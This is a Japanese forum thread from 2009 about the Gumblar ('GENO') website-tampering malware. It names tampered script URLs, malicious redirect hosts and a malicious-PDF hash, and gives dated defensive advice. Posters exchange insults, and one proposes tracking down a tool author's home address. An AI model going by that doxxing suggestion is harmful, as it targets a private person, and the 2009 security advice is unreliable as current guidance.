スピア型なら直に埋め込むのもいいだろうが マス型だと感染しやすい環境を選択するためにもJavaScriptは必須だろ JavaScriptが動く時点で感染しやすい環境の候補でもある
823 :
_ :2009/05/26(火) 11:50:19
ソース見ろよカス
>>823 そこは埋め込みではなく単独のJavaScriptが改竄されていてmartuz●cn行き。
martuz●cnが死んでるから今のところ感染はしないだろうけど。
ニューバージョンと2種類埋め込んであるな www.senlights.co.jp/Scripts/AC_RunActiveContent.js
sqlsodbc.chmが0バイト 簡便してちょー
>>823 感染サイトが0パーって、チェッカーの意味あんの?
829 :
_ :2009/05/26(火) 12:46:15
わかんね とりあえず役立たず>824は死ねよカスオタ
www.ti-a-ra.com www1.odn.ne.jp/revue1999 www.k-q-bury.com どうなのこれw
そんな誰が作ったかわかんないような検査ソフト???よく使う気になれるな
非感染サイトに100%出したり感染サイトに0%出すチェッカーなら俺でも作れるな 俺もアフィやって稼ぐか
833 :
_ :2009/05/26(火) 12:58:23
ハッタリバカw
今日は感染サイトの管理人に凸しないのかよパソオタども
835 :
_ :2009/05/26(火) 13:00:33
誰か早く鑑定しろよカスども
なにこいつ
まとめ見て対策してくださいね(笑)
いかぽの旅館さんお疲れ様です
839 :
_ :2009/05/26(火) 13:02:09
頼むよカスども
www.ti-a-ra.com www1.odn.ne.jp/revue1999 www.k-q-bury.com どうなのこれw
わからないから放置しちゃいますね^^
www.ti-a-ra.com www1.odn.ne.jp/revue1999 www.k-q-bury.com どうなのこれw
www.ti-a-ra.com www1.odn.ne.jp/revue1999 www.k-q-bury.com どうなのこれw
845 :
_ :2009/05/26(火) 13:11:58
全くだ 役立たずなカスどもはこれだから・・・・・
846 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 13:12:05
感染しちゃったwebサイトの謝罪まだー?(笑)
847 :
_ :2009/05/26(火) 13:13:19
GENO謝罪スルーなんだよな もうあそこは終わりだな
リア厨が沸いてるな
849 :
_ :2009/05/26(火) 13:15:12
全くだ カスリア厨、役にたたないよね
危険度1 ユーザに対する脅威になる可能性はほぼ皆無で、話題に取り上げられることも ほとんどありません。蔓延しているという被害届けもないタイプです。 危険度2 危険性が低いか、または中程度(しかし、さほどの影響はなく、対処も十分可能) 、あるいは、大規模な被害または増殖活動を行わないタイプのもので、 特性によってはニュースで大きく取り上げられるウィルスがこの部類に入ります。 危険度3 かなり蔓延度が高い(有害性は低く、抑制可能)か、あるいは、蔓延した場合に 危険な(かつ抑制不可能)タイプです。 危険度4 危険な脅威タイプで、抑制も困難です。 最新のウィルス定義をすぐにダウンロードして、事態に備えてください。 危険度5 非常に危険なタイプの脅威で、抑制も極めて困難です。 このタイプの脅威に備えるには、最新のウィルス定義をただちに ダウンロードし、全てのマシン上でウィルススキャンを実行してください。
ドスパラスレかとおもた
852 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 13:18:36
どのへんが?
謝罪しろよ謝罪 おれは踏んでないけどwwwwww
855 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 13:19:52
どれが?
856 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 13:20:38
なにが?
また担当福田(TT)さんが湧いてるのか
は?意味わからんし
なにそれ妄想癖?
この手のウイルスは全てGENOウイルス、GENOウイルスの亜種っていやー分かるな
862 :
_ :2009/05/26(火) 14:59:11
なんだレスまだかよ カスどもマジ使えねえwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
863 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 15:02:24
お前ID:Hx9+/5Qd0だろ
えっ
えっ
868 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 15:24:07
なにそれこわい
えっ
わきが?
ああああああああああああああああ、わ、わんこがぁぁぁぁぁぁ
今日も感染した奴にメール送ってあげないんですか?
ポート135を閉じたいんですがコントロールパネルの中に管理ツールが見つかりません。 どこにありますか?
管理ツールはコントロールパネルのなかにあるよ
コントロールパネル開いても管理ツールって書いてないんですが 何か間違ってるんでしょうか・・・
ご愁傷様
クラシック表示に切り替えたら出てきました。 ありがとうございました。
スタートアップの種類が半透明で自動になってて無効にできないんですが 何をすればいいですか?
終 息 宣 言
シャイーン(*^-^)b
886 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 17:11:17
887 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 17:15:42
GEOウイルス
こら、他の会社を巻き込むなw
890 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 17:40:04
あーあ 社員は自演してる間があったらなんとかして
894 :
_ :2009/05/26(火) 18:15:10
genoってもっとでかい会社と思えば案外ちっちゃいショップなんだね
94 名前: ヤブテマリ(大阪府) 投稿日: 2009/05/26(火) 17:01:08.73 ID:XemWWEyI
ゲノって読めばいいの?
それともジェノ?
95 名前: オウレン(アラバマ州) 投稿日: 2009/05/26(火) 17:02:06.91 ID:0i0UyLKY
あれいらいGENO1度もアクセスしてないわ
いくつか買ったことあったのにな
96 名前: マリーゴールド(コネチカット州) [sage] 投稿日: 2009/05/26(火) 17:02:12.23 ID:qbsD791N
ノートPC買った俺涙目
97 名前: ツルハナシノブ(長崎県) 投稿日: 2009/05/26(火) 17:06:12.78 ID:0IrcBOMe
>>94 ジェノサイド
GENOに個人情報登録してた奴涙目。
お前らまだゲノきんしてないのかよ・・・
899 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 20:31:27
ウイルスGENOウイルス
どこ行けば感染できるんだ・・・
>>900 zlkon、gumblar、martuzが止まっている間は感染したくてもできないかも?
どうせなら割れサイトとかにのっけて割れ厨を涙目にしてほしかった
そもそも割れサイトはトロイがいっぱいいるからどうでもいいよ
割れ厨は常に危ない状況にあるから危機意識が高い ソースは俺
昔、割れサイトうろうろしてたときは、よけいなスクリプト一切オフで ACTIVEX、くきーはオフってのが常識だったな、いたずらされそうな奴わざわざいれんだろ
インフルエンザネタのMal PDF
http://blog.f-secure.jp/archives/50244449.html Malicious PDF といえば、JSRedir-R(通称Genoウイルス)でも使われるなど、
今旬な攻撃ですね。
内容は豚インフルエンザのネタの標的型メールです。カタコトの日本語の
標題なのでそうそうクリックする人はいないと思いますが、
一応注意しておく必要がありそうです。
Subject: 病人の行動路線,こ?注意なさい
MD5: 9137fec2f6a1b020cd877cebce8b8f67
ちなみに、添付されていたPDFに含まれるコードは
次のようなものでした。
Exploitされますと、中国のサイトへ飛んでいきます。(´;ω;`)
もせあを一晩掛けて落とした挙句、それがウイルスだったときの絶望感は異常。
割れソフトはスパイ大作戦並みに インスコしたPCを発火させるくらいでちょうどいい が、実際にそうなったら確実に世界経済は終わる
俺の隣の部屋が火事になるから止めてくれよ
913 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 22:46:22
法律に詳しい人いる? GENOウイルスチェッカーをつくった奴を 訴えること出来んのか
なにそれこわい
またageか
917 :
sage :2009/05/26(火) 23:01:34
>>913 インチキチェッカー作ってアフェはってるからな〜
詐欺罪?
何が問題なのかkwsk
ID出ないと便利ですね^^
ついに罪人扱いとなりますた
嫌アフェ厨って激しく貧乏くさいよな
自己解釈より事実を優先しろよ
ID出なくても丸分かり
だっておーばんばん
調べてみたらPC感染してた… サイト持ってるから一応ソース確認してみたけどそれらしい書き換えはない ていかもう半年くらい更新してない放置サイトだった FTPソフト使わないと改ざんとかの心配いらない? 更新してたとしてもWEB上からなんだけど
>>927 半年も更新してないHPなんぞさっさと削除
序でにPCも初期化汁
初期化の後はマスク必須
サイト全ページ調べても感染してなかったなら とりあえずPC初期化してからアドべFlashPlayerと Acrobatを最新版に 巡回ブラウザをFireFoxに切り替えてno scriptのアドオン適用 以後サイトの更新はSFTPソフトを使う (SFTPに対応してない安鯖ならこの際移転) うpテスト兼ねてウイルスに感染していた報告ページでも上げる? と書いてて自分で思ったんだけど 感染以前のバックアップがあったら、PC初期化せずに 感染前の日付まで状態を戻しても駄目なのだろうか
すいません、質問なのですが、 テンプレの予防策2の部分で、Remote Procedure Call (RPC)のプロパティ を見てもスタートアップの種類が自動になっていまして、透明になっていじれない 状態なのですが、それとは別に似たような名前のRemote Procedure Call (RPC) Locatorは 無効に出来るみたいなのですが、これは後者をいじればいいのでしょうか?
>>931 それ俺がやったよ。
システムの復元だっけ?
それで一見、元に戻ったように見える。
だが、例のsqなんだかっていうファイルサイズは感染の時のままだし
なぜだかiTunesを立ち上げたときに、ウィルスをアンチウィルスソフト
がつかまえた。
初期化がいいと思うぜ?
テンプレの
>>4 は無視していいよ。
ポート135〜139と445はブロードバンドルータでブロックすればいい。
言い換えると、LAN内で公開してていいけどインターネットには公開するなってこと。
>>933 そっか、有難う
初期化ぬきで復元してもダメなら、
感染してない今のうちにバックアップとって
外付HDDに退避(退避用なので普段は電源オフ)
初期化した後、可能ならHDDからバックアップデータ
呼び出してみようかと思ってたんだ
もし感染する事があったらレポするね
一応ファイル転送ソフトはSFTPに切り替えたけどね
俺もいい加減アドベーにはうんざりした っつかActiveXなんてさっさと廃止すればいいのにとおもうよ
firefoxではactiveXがカットされている上でflashだけの許可が可能なんだが(javascriptは当然無効) この場合、リスクはどの程度なんだろうか?
焼きリスト頼む。
>>937 ブロードバンドルータのマニュアルを見ながら設定を確認
今時の機種なら最初からブロックしてるのが多いんじゃないかな
amazonは無事ですか
ぬるぽ
ルータ確認したらNetBiosを遮断するにチェックが入っていたがこれでいいのだろうか
>>938 YouTube、ニコニコ、Yourfilehost脱却宣言!カコイイ!
各社マスコミHP配信動画なんて見ねーぜという姿勢が潔い
>>945 実際それらは見てないしな・・・
HTML基本構文だけで構成されたページだけで内容が伝わればそれでいい
動画とか使わないと伝えきれないなんて手抜きだと思うよ
947 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 04:50:39
∩ ( ⌒,_ゝ⌒)彡 ⊂彡 ゲノきん!ゲノきん♪
グーグルの先読み機能切る方法教えてください。
913 :名無しさん@お腹いっぱい。:2009/05/26(火) 22:46:22 法律に詳しい人いる? GENOウイルスチェッカーをつくった奴を 訴えること出来んのか ↑マジで訴えてくれ 俺のサイトも全然感染してないはずなのにあのチェッカーで1000%とか言われてアクセスに影響出た 訴えたらブログでも作って報告よろ
amazonアソシエイトにも通報するといいよ 本来なら規約に違反してるしなみんなでGENOチェッカーサイトをamazonに通報しよう
>>949 NET裏技専門店の管理人だろお前
自分のサイトがウイルスに感染してるの知ってて対策しなかったお前が悪い
本気で訴える気あるやつなら2chなんかで聞いてないで自分で調べて弁護士事務所いってるよ。
言うだけ言って自分は何もしない他力本願野郎なんだもん
firefoxでリンク先の先読み機能OFFって効果あるの?
ブラウジング速度に体感上ほぼ影響ないので切って大丈夫 逆にONで問題があるわけでもないので切らなくても大丈夫 どっちでもいい
>>949 こっちは「30%って出たんですけど感染してるんじゃないんですか?」って連絡来たわ
(1000%以外は安全とか書かれる前にチェックしたらしい)
だからチェッカーとか使う前にソース見てから言ってくださいって言っといた
不親切なサイト管理人だなあ チェッカー使うヤツがソース見ても分からないだろうに そんなことだから君のはいつまでたっても弱小サイトなんだよ
Firefoxの先読みはブロードバンドのような高速回線ではセキュリティを下げるだけだ FirefoxもデフォでOFFとけ カス!
気づいていないだけで、FireFoxの先読み機能を悪用した犯罪者もいるだろうな
>>962 古い記事だけど、今のやつは危険性は排除されてるのかな
>>964 無尽蔵に量産されてるエロブログはそういうのを利用して検索サイトで上位に上がるようにしてるとかしてないとか
>>960 チェッカーも悪いがそういう客も頭悪いな
下のレスにもあるけどチェッカー"だけ"使って判断してる人なんて
ソース自体知らないだろうね
>>967 その手を使わないわけない
確実にやってるだろうな
チェッカーなんて置いとくから初心者がどんどん勘違いするんだ ソースビューアにでも置き換えるのがいいんじゃないか
初心者というか詳しくない奴を騙そうとする奴も消えてなくなればいいのに
正論だが2ちゃんに誠実さを求める方が間違ってる
流れを読め
チェッカー利用者がどういう使いかたしてるか知らんがTOPページ以外にも注意書き書くべき Janeのコマンドまで出回ってるんだから
単純にさ、使わなければいいんじゃね?
いや、俺は使ってないけどこれに惑わされる人が多すぎるからさ もう更新する気ないんだろうけど
実際ソースチェッカー使ってる人が多いからGENOチェッカー様はもういいよ
チェッカーみてわかんないなら使わないほうがいいってことじゃないの
なんだこの自分へのレスだと思いこんでる自意識過剰君は
貧乏根性なんだから仕方ないだろ
実際チェッカーにかけて1000%以外はシロだっつってんだから それくらい読めよと。馬鹿はパソコン使うな。
自分がチェッカー使う時の話じゃなくて チェッカー使って誤解する人がいるからって話なのになんですり替えるんだろうな アフィで儲けられないのがそんなに死活問題か
チェッカーの判定仕様だと TOPページだけチェックをかけて白で安心して別のリンクで死亡って事もあるからそこは注意しろ
生活費がかかってんだろうな・・・
チェッカー使って誤解する奴がいるから訴えるっていう己のものすごいすりかえは無視ですか
「1000%」とか意味不明な判定返すの止めればいいのに
アフィなんか生活費どころか小遣いにすらならんだろw 現実は厳しい やった事あるやつなら分かると思うが
自分の懐が痛むわけでもないのにこの潰そうとする必死さはなんだろう
自演でしょ だからと言って、チェッカーの人を擁護する気もないがね
アフィを止めろとかよくわからん反応する奴いるのな チェッカーの方が問題なのに
ソースを見せるだけにするか 判定の内容を直す程度でいいのにねえ アフィアフィと大興奮する奴等は一体何なんだ
アフィは踏まなきゃいいだけ っていうか、ブロックすればいいだけの話だしな 一時はテンプレにまで加えられた時は何、この中身のない情弱池沼?って思ったくらい だが、チェッカーが糞なのは同意
折角だからチェッカー作ったアフィ野郎も住所まで割り出そうぜ
判定はわざと白黒で出さないようにしてるらしい すぐに白黒仕様に変更できるけど、万が一のことを考えてあえてそうしないとのこと 1000%はどうかと思うが
アフィ厨はスルーしてもらって構わないからチェッカーの見直しをしろ 俺はジョークツールなくらいにしか受け取っていないがそうじゃない人が多い以上は改良しないとな
嫌アフィ厨は相手だけが儲かるのが嫌な貧乏根性なんだよ。 でも自分は何でも無料で使えないと認めないんだよね。乞食やだね。
GENOチェッカーを使うやつって ど素人くらいじゃねえの
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。